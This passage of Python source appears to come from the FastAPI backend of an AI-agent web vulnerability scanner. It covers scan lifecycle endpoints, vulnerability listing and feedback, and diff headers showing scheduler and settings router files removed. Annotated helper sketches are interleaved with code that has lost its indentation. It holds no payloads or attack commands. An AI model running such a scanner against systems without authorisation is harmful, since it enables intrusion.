# Apply pagination
query = query.offset((page - 1) * per_page).limit(per_page)
result = await db.execute(query)
scans = result.scalars().all()
# Load targets for each scan
scan_responses = []
for scan in scans:
targets_query = select(Target).where(Target.scan_id == scan.id)
targets_result = await db.execute(targets_query)
targets = targets_result.scalars().all()
scan_dict = scan.to_dict()
scan_dict["targets"] = [t.to_dict() for t in targets]
scan_responses.append(ScanResponse(**scan_dict))
return ScanListResponse(
scans=scan_responses,
total=total,
page=page,
per_page=per_page
)
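# The offset/limit arithmetic in list_scans, sketched over an in-memory list rather than
# a SQLAlchemy query. paginate is a hypothetical helper and assumes page >= 1.

```python
from typing import Any, Dict, List


def paginate(items: List[Any], page: int = 1, per_page: int = 10) -> Dict[str, Any]:
    """Slice items the same way .offset((page - 1) * per_page).limit(per_page) would."""
    offset = (page - 1) * per_page
    return {
        "items": items[offset:offset + per_page],
        "total": len(items),  # total is counted before pagination is applied
        "page": page,
        "per_page": per_page,
    }
```

# A page past the end yields an empty "items" list while "total" stays unchanged.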
@router.post("", response_model=ScanResponse)
async def create_scan(
scan_data: ScanCreate,
background_tasks: BackgroundTasks,
db: AsyncSession = Depends(get_db)
):
"""Create a new scan, optionally with credentials for authenticated testing"""
# Process authentication config
auth_type = None
auth_credentials = None
if scan_data.auth:
auth_type = scan_data.auth.auth_type
auth_credentials = {}
if scan_data.auth.cookie:
auth_credentials["cookie"] = scan_data.auth.cookie
if scan_data.auth.bearer_token:
auth_credentials["bearer_token"] = scan_data.auth.bearer_token
if scan_data.auth.username:
auth_credentials["username"] = scan_data.auth.username
if scan_data.auth.password:
auth_credentials["password"] = scan_data.auth.password
if scan_data.auth.header_name and scan_data.auth.header_value:
auth_credentials["header_name"] = scan_data.auth.header_name
auth_credentials["header_value"] = scan_data.auth.header_value
# Create scan
scan = Scan(
name=scan_data.name or f"Scan {datetime.now().strftime('%Y-%m-%d %H:%M')}",
scan_type=scan_data.scan_type,
recon_enabled=scan_data.recon_enabled,
custom_prompt=scan_data.custom_prompt,
prompt_id=scan_data.prompt_id,
config=scan_data.config,
auth_type=auth_type,
auth_credentials=auth_credentials,
custom_headers=scan_data.custom_headers,
status="pending"
)
db.add(scan)
await db.flush()
# Create targets
targets = []
for url in scan_data.targets:
parsed = urlparse(url)
# Resolve the scheme once so the default port matches the stored protocol
scheme = parsed.scheme or "https"
target = Target(
scan_id=scan.id,
url=url,
hostname=parsed.hostname,
port=parsed.port or (443 if scheme == "https" else 80),
protocol=scheme,
path=parsed.path or "/"
)
db.add(target)
targets.append(target)
await db.commit()
await db.refresh(scan)
scan_dict = scan.to_dict()
scan_dict["targets"] = [t.to_dict() for t in targets]
return ScanResponse(**scan_dict)
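# A minimal sketch of how a target URL is broken into the fields stored on Target.
# parse_target is a hypothetical helper; it resolves the scheme once so that the default
# port and the protocol always agree, and it assumes URLs without a scheme mean https.

```python
from typing import Dict, Optional, Union
from urllib.parse import urlparse


def parse_target(url: str) -> Dict[str, Union[str, int, None]]:
    """Split a URL into hostname, port, protocol and path with sensible defaults."""
    parsed = urlparse(url)
    scheme = parsed.scheme or "https"
    hostname: Optional[str] = parsed.hostname
    return {
        "hostname": hostname,
        # An explicit port wins; otherwise use the scheme's conventional port.
        "port": parsed.port or (443 if scheme == "https" else 80),
        "protocol": scheme,
        "path": parsed.path or "/",
    }
```

# Note that urlparse only recognises the host when the URL includes "//", so a bare
# "example.com" yields hostname None and may deserve validation before a scan is created.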
@router.get("/{scan_id}", response_model=ScanResponse)
async def get_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Get scan details by ID"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Load targets
targets_result = await db.execute(select(Target).where(Target.scan_id == scan_id))
targets = targets_result.scalars().all()
scan_dict = scan.to_dict()
scan_dict["targets"] = [t.to_dict() for t in targets]
return ScanResponse(**scan_dict)
@router.post("/{scan_id}/start")
async def start_scan(
scan_id: str,
background_tasks: BackgroundTasks,
db: AsyncSession = Depends(get_db)
):
"""Start a scan execution"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status == "running":
raise HTTPException(status_code=400, detail="Scan is already running")
# Update scan status
scan.status = "running"
scan.started_at = datetime.utcnow()
scan.current_phase = "initializing"
scan.progress = 0
await db.commit()
# Start scan in background with its own database session
background_tasks.add_task(run_scan_task, scan_id)
return {"message": "Scan started", "scan_id": scan_id}
@router.post("/{scan_id}/stop")
async def stop_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Stop a running scan and save partial results"""
from backend.api.websocket import manager as ws_manager
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status not in ("running", "paused"):
raise HTTPException(status_code=400, detail="Scan is not running or paused")
# Signal the running agent to stop
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].cancel()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "stopped"
agent_results[agent_id]["phase"] = "stopped"
# Update scan status
scan.status = "stopped"
scan.completed_at = datetime.utcnow()
scan.current_phase = "stopped"
# Calculate duration
if scan.started_at:
duration = (scan.completed_at - scan.started_at).total_seconds()
scan.duration = int(duration)
# Compute final vulnerability statistics from database
for severity in ["critical", "high", "medium", "low", "info"]:
count_result = await db.execute(
select(func.count()).select_from(Vulnerability)
.where(Vulnerability.scan_id == scan_id)
.where(Vulnerability.severity == severity)
)
setattr(scan, f"{severity}_count", count_result.scalar() or 0)
# Get total vulnerability count
total_vuln_result = await db.execute(
select(func.count()).select_from(Vulnerability)
.where(Vulnerability.scan_id == scan_id)
)
scan.total_vulnerabilities = total_vuln_result.scalar() or 0
# Get total endpoint count
total_endpoint_result = await db.execute(
select(func.count()).select_from(Endpoint)
.where(Endpoint.scan_id == scan_id)
)
scan.total_endpoints = total_endpoint_result.scalar() or 0
await db.commit()
# Build summary for WebSocket broadcast
summary = {
"total_endpoints": scan.total_endpoints,
"total_vulnerabilities": scan.total_vulnerabilities,
"critical": scan.critical_count,
"high": scan.high_count,
"medium": scan.medium_count,
"low": scan.low_count,
"info": scan.info_count,
"duration": scan.duration,
"progress": scan.progress
}
# Broadcast stop event via WebSocket
await ws_manager.broadcast_scan_stopped(scan_id, summary)
await ws_manager.broadcast_log(scan_id, "warning", "Scan stopped by user")
await ws_manager.broadcast_log(scan_id, "info", f"Partial results: {scan.total_vulnerabilities} vulnerabilities found")
# Auto-generate partial report
report_data = None
try:
from backend.services.report_service import auto_generate_report
await ws_manager.broadcast_log(scan_id, "info", "Generating partial report...")
report = await auto_generate_report(db, scan_id, is_partial=True)
report_data = report.to_dict()
await ws_manager.broadcast_log(scan_id, "info", f"Partial report generated: {report.title}")
except Exception as report_error:
await ws_manager.broadcast_log(scan_id, "warning", f"Failed to generate partial report: {str(report_error)}")
return {
"message": "Scan stopped",
"scan_id": scan_id,
"summary": summary,
"report": report_data
}
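# stop_scan computes its per-severity counts with one SQL COUNT query per level. The same
# summary shape can be sketched in memory, which may help when testing the WebSocket
# payload. summarize_severities is a hypothetical helper, not part of this module.

```python
from collections import Counter
from typing import Dict, Iterable

SEVERITIES = ("critical", "high", "medium", "low", "info")


def summarize_severities(severities: Iterable[str]) -> Dict[str, int]:
    """Count findings per known severity plus an overall total."""
    items = list(severities)
    counts = Counter(items)
    summary = {sev: counts.get(sev, 0) for sev in SEVERITIES}
    # The total covers every finding, including any with an unexpected severity label.
    summary["total_vulnerabilities"] = len(items)
    return summary
```

# In the endpoint itself the database remains the source of truth; this only mirrors the
# resulting structure.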
@router.post("/{scan_id}/pause")
async def pause_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Pause a running scan"""
from backend.api.websocket import manager as ws_manager
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status != "running":
raise HTTPException(status_code=400, detail="Scan is not running")
# Signal the agent to pause
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].pause()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "paused"
agent_results[agent_id]["phase"] = "paused"
scan.status = "paused"
scan.current_phase = "paused"
await db.commit()
await ws_manager.broadcast_log(scan_id, "warning", "Scan paused by user")
return {"message": "Scan paused", "scan_id": scan_id}
@router.post("/{scan_id}/resume")
async def resume_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Resume a paused scan"""
from backend.api.websocket import manager as ws_manager
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status != "paused":
raise HTTPException(status_code=400, detail="Scan is not paused")
# Signal the agent to resume
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].resume()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "running"
agent_results[agent_id]["phase"] = "testing"
scan.status = "running"
scan.current_phase = "testing"
await db.commit()
await ws_manager.broadcast_log(scan_id, "info", "Scan resumed by user")
return {"message": "Scan resumed", "scan_id": scan_id}
@router.post("/{scan_id}/skip-to/{target_phase}")
async def skip_to_phase_endpoint(scan_id: str, target_phase: str, db: AsyncSession = Depends(get_db)):
"""Skip the current scan phase and jump to a target phase.
Valid phases: recon, analyzing, testing, completed
Can only skip forward (to a phase ahead of current).
"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status not in ("running", "paused"):
raise HTTPException(status_code=400, detail="Scan is not running or paused")
# Validate the request before touching scan state, so a rejected skip has no side effects
if target_phase not in PHASE_ORDER:
raise HTTPException(
status_code=400,
detail=f"Invalid phase '{target_phase}'. Valid: {', '.join(PHASE_ORDER[1:])}"
)
# Validate forward skip
current_idx = PHASE_ORDER.index(scan.current_phase) if scan.current_phase in PHASE_ORDER else 0
target_idx = PHASE_ORDER.index(target_phase)
if target_idx <= current_idx:
raise HTTPException(
status_code=400,
detail=f"Cannot skip backward. Current: {scan.current_phase}, target: {target_phase}"
)
# If paused, resume first so the skip can be processed
if scan.status == "paused":
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].resume()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "running"
agent_results[agent_id]["phase"] = agent_results[agent_id].get("last_phase", "testing")
scan.status = "running"
await db.commit()
# Signal the running scan to skip
success = _skip_to_phase(scan_id, target_phase)
if not success:
raise HTTPException(status_code=500, detail="Failed to signal phase skip")
# Broadcast via WebSocket
from backend.api.websocket import manager as ws_manager
await ws_manager.broadcast_log(scan_id, "warning", f">> User requested skip to phase: {target_phase}")
await ws_manager.broadcast_phase_change(scan_id, f"skipping_to_{target_phase}")
return {
"message": f"Skipping to phase: {target_phase}",
"scan_id": scan_id,
"from_phase": scan.current_phase,
"target_phase": target_phase
}
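# The forward-only rule enforced by skip_to_phase_endpoint, sketched as a pure function.
# The real PHASE_ORDER lives in backend.services.scan_service and is not shown here, so
# ASSUMED_PHASE_ORDER below is an assumption based on the docstring; validate_skip is a
# hypothetical name.

```python
from typing import Sequence

# Assumed ordering: an initial phase followed by the four phases named in the docstring.
ASSUMED_PHASE_ORDER = ("initializing", "recon", "analyzing", "testing", "completed")


def validate_skip(
    current_phase: str,
    target_phase: str,
    order: Sequence[str] = ASSUMED_PHASE_ORDER,
) -> int:
    """Return the target phase index, or raise ValueError if the skip is not allowed."""
    if target_phase not in order:
        raise ValueError(f"Invalid phase '{target_phase}'")
    # Unknown current phases (for example "paused") are treated as the first phase.
    current_idx = order.index(current_phase) if current_phase in order else 0
    target_idx = order.index(target_phase)
    if target_idx <= current_idx:
        raise ValueError(f"Cannot skip backward from {current_phase} to {target_phase}")
    return target_idx
```

# Running this check before resuming a paused agent keeps a rejected request free of
# side effects.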
@router.get("/{scan_id}/status", response_model=ScanProgress)
async def get_scan_status(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Get scan progress and status"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
return ScanProgress(
scan_id=scan.id,
status=scan.status,
progress=scan.progress,
current_phase=scan.current_phase,
total_endpoints=scan.total_endpoints,
total_vulnerabilities=scan.total_vulnerabilities
)
@router.delete("/{scan_id}")
async def delete_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Delete a scan"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status == "running":
raise HTTPException(status_code=400, detail="Cannot delete running scan")
await db.delete(scan)
await db.commit()
return {"message": "Scan deleted", "scan_id": scan_id}
@router.get("/{scan_id}/endpoints")
async def get_scan_endpoints(
scan_id: str,
page: int = 1,
per_page: int = 50,
db: AsyncSession = Depends(get_db)
):
"""Get endpoints discovered in a scan"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
query = select(Endpoint).where(Endpoint.scan_id == scan_id).order_by(Endpoint.discovered_at.desc())
# Count
count_result = await db.execute(select(func.count()).select_from(Endpoint).where(Endpoint.scan_id == scan_id))
total = count_result.scalar()
# Paginate
query = query.offset((page - 1) * per_page).limit(per_page)
result = await db.execute(query)
endpoints = result.scalars().all()
return {
"endpoints": [e.to_dict() for e in endpoints],
"total": total,
"page": page,
"per_page": per_page
}
@router.get("/{scan_id}/vulnerabilities")
async def get_scan_vulnerabilities(
scan_id: str,
severity: Optional[str] = None,
page: int = 1,
per_page: int = 50,
db: AsyncSession = Depends(get_db)
):
"""Get vulnerabilities found in a scan"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
query = select(Vulnerability).where(Vulnerability.scan_id == scan_id)
if severity:
query = query.where(Vulnerability.severity == severity)
query = query.order_by(Vulnerability.created_at.desc())
# Count
count_query = select(func.count()).select_from(Vulnerability).where(Vulnerability.scan_id == scan_id)
if severity:
count_query = count_query.where(Vulnerability.severity == severity)
count_result = await db.execute(count_query)
total = count_result.scalar()
# Paginate
query = query.offset((page - 1) * per_page).limit(per_page)
result = await db.execute(query)
vulnerabilities = result.scalars().all()
return {
"vulnerabilities": [v.to_dict() for v in vulnerabilities],
"total": total,
"page": page,
"per_page": per_page
}
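Both list endpoints above turn `page` and `per_page` directly into `offset`/`limit`, so `page=0` would produce a negative offset. The following is a minimal sketch of a clamped window calculation; the helper name `page_window` and the `max_per_page` cap are assumptions for illustration and are not part of the original router.

```python
from typing import Tuple


def page_window(page: int, per_page: int, max_per_page: int = 200) -> Tuple[int, int]:
    """Return (offset, limit) for 1-based pagination, clamping bad input.

    Hypothetical helper: the router computes (page - 1) * per_page inline
    and does not clamp either value.
    """
    page = max(1, page)                              # page numbers start at 1
    per_page = min(max(1, per_page), max_per_page)   # keep limit in [1, max_per_page]
    return (page - 1) * per_page, per_page


if __name__ == "__main__":
    print(page_window(1, 50))    # first page
    print(page_window(3, 50))    # third page
    print(page_window(0, 1000))  # out-of-range input is clamped
```

The result could feed `query.offset(offset).limit(limit)` unchanged; whether a cap of 200 suits this API is a judgment call.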
class ValidationRequest(BaseModel):
validation_status: str # "validated" | "false_positive" | "ai_confirmed" | "ai_rejected" | "pending_review"
notes: Optional[str] = None
@router.patch("/vulnerabilities/{vuln_id}/validate")
async def validate_vulnerability(
vuln_id: str,
body: ValidationRequest,
db: AsyncSession = Depends(get_db)
):
"""Manually validate or reject a vulnerability finding"""
valid_statuses = {"validated", "false_positive", "ai_confirmed", "ai_rejected", "pending_review"}
if body.validation_status not in valid_statuses:
        # Sort the set so the error message lists statuses in a stable order
        raise HTTPException(status_code=400, detail=f"Invalid status. Must be one of: {', '.join(sorted(valid_statuses))}")
result = await db.execute(select(Vulnerability).where(Vulnerability.id == vuln_id))
vuln = result.scalar_one_or_none()
if not vuln:
raise HTTPException(status_code=404, detail="Vulnerability not found")
old_status = vuln.validation_status or "ai_confirmed"
vuln.validation_status = body.validation_status
if body.notes:
vuln.ai_rejection_reason = body.notes
# Update scan severity counts when validation status changes
scan_result = await db.execute(select(Scan).where(Scan.id == vuln.scan_id))
scan = scan_result.scalar_one_or_none()
if scan:
sev = vuln.severity
# If changing from rejected to validated: add to counts
if old_status == "ai_rejected" and body.validation_status == "validated":
scan.total_vulnerabilities = (scan.total_vulnerabilities or 0) + 1
if sev == "critical":
scan.critical_count = (scan.critical_count or 0) + 1
elif sev == "high":
scan.high_count = (scan.high_count or 0) + 1
elif sev == "medium":
scan.medium_count = (scan.medium_count or 0) + 1
elif sev == "low":
scan.low_count = (scan.low_count or 0) + 1
elif sev == "info":
scan.info_count = (scan.info_count or 0) + 1
# If changing from confirmed to false_positive: subtract from counts
elif old_status in ("ai_confirmed", "validated") and body.validation_status == "false_positive":
scan.total_vulnerabilities = max(0, (scan.total_vulnerabilities or 0) - 1)
if sev == "critical":
scan.critical_count = max(0, (scan.critical_count or 0) - 1)
elif sev == "high":
scan.high_count = max(0, (scan.high_count or 0) - 1)
elif sev == "medium":
scan.medium_count = max(0, (scan.medium_count or 0) - 1)
elif sev == "low":
scan.low_count = max(0, (scan.low_count or 0) - 1)
elif sev == "info":
scan.info_count = max(0, (scan.info_count or 0) - 1)
await db.commit()
return {"message": "Vulnerability validation updated", "vulnerability": vuln.to_dict()}
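The count bookkeeping in `validate_vulnerability` reduces to a small transition rule: a rejected finding that becomes validated adds one, a counted finding that becomes a false positive subtracts one, and everything else leaves the totals alone. A sketch of that rule as pure functions follows; `count_delta`, `apply_delta`, and the plain-dict stand-in for the `Scan` row are assumptions made for illustration.

```python
COUNTED_STATUSES = {"ai_confirmed", "validated"}


def count_delta(old_status: str, new_status: str) -> int:
    """Mirror the two branches of the handler: +1, -1, or no change."""
    if old_status == "ai_rejected" and new_status == "validated":
        return 1
    if old_status in COUNTED_STATUSES and new_status == "false_positive":
        return -1
    return 0


def apply_delta(counts: dict, severity: str, delta: int) -> dict:
    """Return a copy of counts with the total and per-severity counters adjusted.

    `counts` is a hypothetical dict stand-in for the Scan model's columns.
    Counters never drop below zero, matching the max(0, ...) guards above.
    """
    updated = dict(counts)
    for key in ("total_vulnerabilities", f"{severity}_count"):
        if key in updated:
            updated[key] = max(0, (updated[key] or 0) + delta)
    return updated


if __name__ == "__main__":
    scan = {"total_vulnerabilities": 2, "high_count": 1}
    delta = count_delta("ai_confirmed", "false_positive")
    print(apply_delta(scan, "high", delta))
```

Keeping the rule in one function would also let the feedback endpoint share it instead of re-implementing the decrement.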
# --- Adaptive Learning Feedback ---
class FeedbackRequest(BaseModel):
is_true_positive: bool
explanation: str = ""
@router.post("/vulnerabilities/{vuln_id}/feedback")
async def submit_vulnerability_feedback(
vuln_id: str,
body: FeedbackRequest,
db: AsyncSession = Depends(get_db)
):
"""Submit TP/FP feedback for a vulnerability finding.
Records feedback in the adaptive learner so the agent improves over time.
Also updates the validation_status in the database.
"""
result = await db.execute(select(Vulnerability).where(Vulnerability.id == vuln_id))
vuln = result.scalar_one_or_none()
if not vuln:
raise HTTPException(status_code=404, detail="Vulnerability not found")
    if len(body.explanation.strip()) < 3 and not body.is_true_positive:
        raise HTTPException(status_code=400, detail="Explanation required for false positive feedback (min 3 chars)")
    # Remember the previous status so repeated FP feedback cannot decrement the counts twice
    old_status = vuln.validation_status or "ai_confirmed"
    # Update DB validation status
    vuln.validation_status = "validated" if body.is_true_positive else "false_positive"
    if body.explanation:
        vuln.ai_rejection_reason = body.explanation
    # Update scan counts only when a previously counted finding becomes a false positive
    scan_result = await db.execute(select(Scan).where(Scan.id == vuln.scan_id))
    scan = scan_result.scalar_one_or_none()
    if scan and not body.is_true_positive and old_status in ("ai_confirmed", "validated"):
        sev = vuln.severity
        scan.total_vulnerabilities = max(0, (scan.total_vulnerabilities or 0) - 1)
        count_attr = f"{sev}_count"
        if hasattr(scan, count_attr):
            setattr(scan, count_attr, max(0, (getattr(scan, count_attr) or 0) - 1))
    await db.commit()
# Record in adaptive learner
pattern_count = 0
try:
from backend.core.adaptive_learner import AdaptiveLearner
learner = AdaptiveLearner()
vuln_dict = vuln.to_dict()
learner.record_feedback(
vuln_id=vuln_id,
vuln_type=vuln_dict.get("vuln_type", "unknown"),
endpoint=vuln_dict.get("url", ""),
param=vuln_dict.get("parameter", ""),
payload=vuln_dict.get("payload", ""),
is_tp=body.is_true_positive,
explanation=body.explanation,
severity=vuln_dict.get("severity", "medium"),
domain=vuln_dict.get("url", ""),
)
stats = learner.get_stats()
pattern_count = stats.get("total_patterns", 0)
except Exception as e:
logger.warning(f"Adaptive learner feedback failed: {e}")
return {
"message": "Feedback recorded",
"vulnerability_id": vuln_id,
"is_true_positive": body.is_true_positive,
"pattern_count": pattern_count,
}
@router.get("/vulnerabilities/learning/stats")
async def get_learning_stats():
"""Get adaptive learning statistics."""
try:
from backend.core.adaptive_learner import AdaptiveLearner
learner = AdaptiveLearner()
return learner.get_stats()
except Exception as e:
return {"error": str(e), "total_feedback": 0, "total_patterns": 0}
-140
@@ -1,140 +0,0 @@
"""
NeuroSploit v3 - Scheduler API Router
CRUD endpoints for managing scheduled scan jobs.
"""
import json
from pathlib import Path
from fastapi import APIRouter, HTTPException, Request
from pydantic import BaseModel
from typing import Optional, List, Dict
router = APIRouter()
CONFIG_PATH = Path(__file__).parent.parent.parent.parent / "config" / "config.json"
class ScheduleJobRequest(BaseModel):
"""Request model for creating a scheduled job."""
job_id: str
target: str
scan_type: str = "quick"
cron_expression: Optional[str] = None
interval_minutes: Optional[int] = None
agent_role: Optional[str] = None
llm_profile: Optional[str] = None
class ScheduleJobResponse(BaseModel):
"""Response model for a scheduled job."""
id: str
target: str
scan_type: str
schedule: str
status: str
next_run: Optional[str] = None
last_run: Optional[str] = None
run_count: int = 0
@router.get("/", response_model=List[Dict])
async def list_scheduled_jobs(request: Request):
"""List all scheduled scan jobs."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
return []
return scheduler.list_jobs()
@router.post("/", response_model=Dict)
async def create_scheduled_job(job: ScheduleJobRequest, request: Request):
"""Create a new scheduled scan job."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
raise HTTPException(status_code=503, detail="Scheduler not available")
if not job.cron_expression and not job.interval_minutes:
raise HTTPException(
status_code=400,
detail="Either cron_expression or interval_minutes must be provided"
)
result = scheduler.add_job(
job_id=job.job_id,
target=job.target,
scan_type=job.scan_type,
cron_expression=job.cron_expression,
interval_minutes=job.interval_minutes,
agent_role=job.agent_role,
llm_profile=job.llm_profile
)
if "error" in result:
raise HTTPException(status_code=400, detail=result["error"])
return result
@router.delete("/{job_id}")
async def delete_scheduled_job(job_id: str, request: Request):
"""Delete a scheduled scan job."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
raise HTTPException(status_code=503, detail="Scheduler not available")
success = scheduler.remove_job(job_id)
if not success:
raise HTTPException(status_code=404, detail=f"Job '{job_id}' not found")
return {"message": f"Job '{job_id}' deleted", "id": job_id}
@router.post("/{job_id}/pause")
async def pause_scheduled_job(job_id: str, request: Request):
"""Pause a scheduled scan job."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
raise HTTPException(status_code=503, detail="Scheduler not available")
success = scheduler.pause_job(job_id)
if not success:
raise HTTPException(status_code=404, detail=f"Job '{job_id}' not found")
return {"message": f"Job '{job_id}' paused", "id": job_id, "status": "paused"}
@router.post("/{job_id}/resume")
async def resume_scheduled_job(job_id: str, request: Request):
"""Resume a paused scheduled scan job."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
raise HTTPException(status_code=503, detail="Scheduler not available")
success = scheduler.resume_job(job_id)
if not success:
raise HTTPException(status_code=404, detail=f"Job '{job_id}' not found")
return {"message": f"Job '{job_id}' resumed", "id": job_id, "status": "active"}
@router.get("/agent-roles", response_model=List[Dict])
async def get_agent_roles():
"""Return available agent roles from config.json for scheduler dropdown."""
try:
if not CONFIG_PATH.exists():
return []
config = json.loads(CONFIG_PATH.read_text())
roles = config.get("agent_roles", {})
result = []
for role_id, role_data in roles.items():
if role_data.get("enabled", True):
result.append({
"id": role_id,
"name": role_id.replace("_", " ").title(),
"description": role_data.get("description", ""),
"tools": role_data.get("tools_allowed", []),
})
return result
except Exception:
return []
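The role listing in `get_agent_roles` can be exercised without a `config.json` on disk by separating the filtering from the file read. The sketch below assumes the same `agent_roles` layout the endpoint reads; the function name `enabled_roles` and the sample role data are hypothetical.

```python
from typing import Dict, List


def enabled_roles(config: Dict) -> List[Dict]:
    """Build the dropdown entries for every role not explicitly disabled."""
    roles = config.get("agent_roles", {})
    return [
        {
            "id": role_id,
            "name": role_id.replace("_", " ").title(),
            "description": data.get("description", ""),
            "tools": data.get("tools_allowed", []),
        }
        for role_id, data in roles.items()
        if data.get("enabled", True)  # a missing "enabled" key counts as enabled
    ]


if __name__ == "__main__":
    sample = {
        "agent_roles": {
            "bug_bounty_hunter": {"description": "Web recon", "tools_allowed": ["nmap"]},
            "red_team": {"enabled": False},
        }
    }
    print(enabled_roles(sample))
```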
-727
@@ -1,727 +0,0 @@
"""
NeuroSploit v3 - Settings API Endpoints
"""
import os
import re
import time
from pathlib import Path
from typing import Optional, Dict, List
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, delete, text
from pydantic import BaseModel
from backend.db.database import get_db, engine
from backend.models import Scan, Target, Endpoint, Vulnerability, VulnerabilityTest, Report
router = APIRouter()
# Path to .env file (project root)
ENV_FILE_PATH = Path(__file__).parent.parent.parent.parent / ".env"
def _update_env_file(updates: Dict[str, str]) -> bool:
"""
Update key=value pairs in the .env file without breaking formatting.
- If the key exists (even commented out), update its value
- If the key doesn't exist, append it
- Preserves comments and blank lines
"""
if not ENV_FILE_PATH.exists():
return False
try:
lines = ENV_FILE_PATH.read_text().splitlines()
updated_keys = set()
new_lines = []
for line in lines:
stripped = line.strip()
matched = False
for key, value in updates.items():
# Match: KEY=..., # KEY=..., #KEY=...
pattern = rf'^#?\s*{re.escape(key)}\s*='
if re.match(pattern, stripped):
# Replace with uncommented key=value
new_lines.append(f"{key}={value}")
updated_keys.add(key)
matched = True
break
if not matched:
new_lines.append(line)
# Append any keys that weren't found in existing file
for key, value in updates.items():
if key not in updated_keys:
new_lines.append(f"{key}={value}")
# Write back with trailing newline
ENV_FILE_PATH.write_text("\n".join(new_lines) + "\n")
return True
except Exception as e:
print(f"Warning: Failed to update .env file: {e}")
return False
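The line-rewriting rule in `_update_env_file` is easier to check when it operates on a list of strings instead of the file itself. A minimal sketch under that assumption: `apply_env_updates` is a hypothetical name, and it uses the same regular expression as the function above.

```python
import re
from typing import Dict, List


def apply_env_updates(lines: List[str], updates: Dict[str, str]) -> List[str]:
    """Return new .env lines with `updates` applied.

    A line matching KEY=..., # KEY=... or #KEY=... is replaced by an
    uncommented KEY=value; unmatched keys are appended at the end.
    """
    updated_keys = set()
    out = []
    for line in lines:
        stripped = line.strip()
        for key, value in updates.items():
            if re.match(rf'^#?\s*{re.escape(key)}\s*=', stripped):
                out.append(f"{key}={value}")
                updated_keys.add(key)
                break
        else:
            out.append(line)  # comments, blanks and unrelated keys pass through
    out.extend(f"{k}={v}" for k, v in updates.items() if k not in updated_keys)
    return out


if __name__ == "__main__":
    before = ["# LLM keys", "# OPENAI_API_KEY=", "", "DEBUG=1"]
    after = apply_env_updates(before, {"OPENAI_API_KEY": "sk-test", "NEW_KEY": "x"})
    print("\n".join(after))
```

Note that a key present both commented and uncommented would be rewritten on both lines; the original function behaves the same way.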
class SettingsUpdate(BaseModel):
"""Settings update schema"""
llm_provider: Optional[str] = None
llm_model: Optional[str] = None
anthropic_api_key: Optional[str] = None
openai_api_key: Optional[str] = None
nim_api_key: Optional[str] = None
openrouter_api_key: Optional[str] = None
gemini_api_key: Optional[str] = None
together_api_key: Optional[str] = None
fireworks_api_key: Optional[str] = None
ollama_base_url: Optional[str] = None
lmstudio_base_url: Optional[str] = None
max_concurrent_scans: Optional[int] = None
aggressive_mode: Optional[bool] = None
default_scan_type: Optional[str] = None
recon_enabled_by_default: Optional[bool] = None
enable_model_routing: Optional[bool] = None
enable_knowledge_augmentation: Optional[bool] = None
enable_browser_validation: Optional[bool] = None
max_output_tokens: Optional[int] = None
# Notifications
enable_notifications: Optional[bool] = None
discord_webhook_url: Optional[str] = None
telegram_bot_token: Optional[str] = None
telegram_chat_id: Optional[str] = None
twilio_account_sid: Optional[str] = None
twilio_auth_token: Optional[str] = None
twilio_from_number: Optional[str] = None
twilio_to_number: Optional[str] = None
notification_severity_filter: Optional[str] = None
class SettingsResponse(BaseModel):
"""Settings response schema"""
llm_provider: str = "claude"
llm_model: str = ""
has_anthropic_key: bool = False
has_openai_key: bool = False
has_nim_key: bool = False
has_openrouter_key: bool = False
has_gemini_key: bool = False
has_together_key: bool = False
has_fireworks_key: bool = False
ollama_base_url: str = ""
lmstudio_base_url: str = ""
max_concurrent_scans: int = 3
aggressive_mode: bool = False
default_scan_type: str = "full"
